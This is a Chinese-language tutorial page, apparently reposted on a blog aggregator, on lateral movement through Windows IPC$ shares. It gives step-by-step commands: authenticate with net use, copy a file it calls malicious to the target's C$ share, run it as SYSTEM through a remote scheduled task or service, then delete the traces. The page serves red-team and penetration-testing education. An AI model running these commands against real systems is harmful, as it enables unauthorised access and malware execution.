IPC横向移动

这篇具有很好参考价值的文章主要介绍了IPC横向移动。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

IPC横向移动

目录
  • IPC横向移动
    • 一、IPC介绍
    • 二、IPC利用条件
    • 三、IPC连接失败原因
    • 四、IPC连接常见错误
    • 五、IPC配合计划任务横向移动
    • 六、IPC配合系统服务横向移动

一、IPC介绍

IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。

通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等 操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

二、IPC利用条件

1、开启了139、445端口

ipc可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。通过139、445( Windows2000)端口,可以实现对共享文件打印机的访问。因此,一般来讲,ipc连接需要139、445端口的支持。

2、管理员开启了默认共享

默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(c$、d$、e$等和系统目录 winnt或 windows( adminS)通过ipc$,可以实现对这些默认共享目录的访问。

三、IPC连接失败原因

1、用户名或密码错误

2、目标没有打开ipc默认共享

3、不能成功连接目标的139、445端口

四、IPC连接常见错误

错误号5:拒绝访问
错误号51:Windows无法找到网络路径,即网络中存在问题。
错误号53:找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动目标有防火
墙(端口过滤)
错误号67:找不到网络名,包括lanmanworkstation服务未启动、ipcs已被删除
错误号1219:提供的凭据与已存在的凭据集冲突。例如,已经和目标建立了ipcs,需要在删除原连接后重新进
行连接。
错误号1326:未知的用户名或错误的密码
错误号l792:试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连接域控制器时会出
现此情况)。
错误号2242:此用户的密码已经过期。例如:目标机器设置了账号管理策略,强制用户定期修改密码。

五、IPC配合计划任务横向移动

1、建立IPC连接

net use \\192.168.142.10\ipc$ "密码" /user:账户

2、复制恶意文件

shell copy C:\Users\Administrator\Desktop\can.exe \\192.168.142.10\c$\Users\Administrator\Desktop

3、创建计划任务

schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /f
shell schtasks /create /u administrator /p admin@123 /s 192.168.142.10 /tn can /sc onstart /tr C:\Users\Administrator\Desktop\can.exe /ru system /f

4、执行计划任务

schtasks /run /s IP地址 /i /tn "计划任务名"
shell schtasks /run /u administrator /p admin@123 /s 192.168.142.10 /i /tn "can"

5、删除计划任务

schtasks /delete /s IP地址 /tn "计划任务名" /f
shell schtasks /delete /u administrator /p admin@123 /s 192.168.142.10 /tn "can" /f

6、清除IPC连接

net use \\IP /del /y
shell net use \\192.168.142.10 /del /y

六、IPC配合系统服务横向移动

1、建立IPC连接

net use \\192.168.142.10\ipc$ "密码" /user:账户

2、复制恶意文件

shell copy C:\Users\Administrator\Desktop\can.exe \\192.168.142.10\c$\Users\Administrator\Desktop

3、创建服务

shell sc \\192.168.142.10 create can binpath= "cmd.exe /c C:\Users\Administrator\Desktop\can.exe"

4、开启服务

shell sc \\192.168.142.10 start can

5、删除服务文章来源地址https://www.toymoban.com/news/detail-469708.html

shell sc \\192.168.142.10 delete can

到了这里,关于IPC横向移动的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网环境横向移动——利用DCOM(2)

    PTH 部分基于 NTLM 认证进行攻击,而 PTT 基于 kerberos 协议进行攻击 PTT 中最常见的三种攻击方式为:MS14-068、黄金票据、白银票据 MS14-068 是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该

    2024年01月24日
    浏览(31)
  • 传递攻击-横向移动

    目录 传递攻击-横向移动 一、哈希传递攻击(PTH) 二、哈希传递条件 三、哈希传递攻击步骤 四、密钥传递攻击(PTK) 五、KB2871997补丁 六、密钥传递攻击步骤 七、票据传递攻击(PTT) 八、票据传递攻击两种方式 九、票据传递攻击步骤 哈希传递攻击(Pass The Hash)是基于 N

    2024年02月08日
    浏览(29)
  • 使用外部工具横向移动

    Smbexe、Psexec Psexec PsExec是一种轻巧的telnet代替品,可让您在其他系统上执行进程,并为控制台应用提供完整的交互性,无需手动安装客户端软件。 原理: 1、ipc$连接,释放Psexesvc.exe 2、OpenSCManager打开受害者机器上服务控制管理器的句柄 3、CreateService创建服务 4、获取服务句柄

    2024年02月07日
    浏览(26)
  • DCOM远程执行命令横向移动

    目录 DCOM远程执行命令横向移动 一、DCOM介绍 二、获取DCOM列表 三、DCOM横向条件 四、MMC20.Application远程执行命令 五、ShellWindows远程执行命令 六、ShellBrowserWindow远程执行命令 七、调用Excel.Application远程执行命令 八、Visio.Application远程执行命令 九、Outlook.Application远程执行命令

    2024年02月08日
    浏览(27)
  • WMIC远程执行命令横向移动

    目录 WMIC远程执行命令横向移动 一、wmic介绍 二、wmic常用命令 三、wmic配合powershell上线CS 四、Wmiexec配合powershell上线CS 五、wmiexec.vbs配合powershell上线CS 六、Invoke-WMIExec.ps1配合powershell上线CS 七、Invoke-WMIMethod.ps1上线CS wmic扩展wmi(Windows Management Instrumentation,Windows管理工具) ,提

    2024年02月08日
    浏览(27)
  • 内网渗透-内置工具横向移动

    前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view

    2024年02月09日
    浏览(29)
  • 红队视角下的AWS横向移动

    0x01 前言 本文主要从红队视角讲述AWS公有云中的一些横向移动思路以及对应的一些身份和权限基础。 概括一下AWS横向移动思路:在获得一个凭据(AK、SK等)的前提下,枚举所有可访问资源,再通过可控制资源获得更多的凭据,获得更多资源控制权。 所以本文从下面三个方面

    2024年01月18日
    浏览(26)
  • 域用户枚举和密码喷洒攻击横向移动

    目录 域用户枚举和密码喷洒攻击横向移动 一、域内用户枚举攻击原理 二、域内用户枚举工具 三、密码喷洒攻击原理 四、密码喷洒工具 正常域用户登录主机,我们可以通过 \\\"net user /domain\\\"来列举出域内的用户。但是当我们用非域用户进行登录时,是不能使用 \\\"net user /domain\\\"这

    2024年02月07日
    浏览(23)
  • 关于低功耗IPC市场介绍之原厂介绍

    2018年至2020年,家用智能视觉(消费类IPC)市场高速增长,据艾瑞咨询测算,2020年中国家用智能视觉产品市场规模达到331亿元,自2016年以来年复合增长率高达53.5%。经过2016年的爆发式增长,家用摄像头市场现已处于相对成熟阶段,2020年中国家用摄像头出货量达4040万台,预计

    2024年02月03日
    浏览(28)
  • 攻防演练中红队常用的攻击方法之横向移动(上)

    横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上

    2024年02月12日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包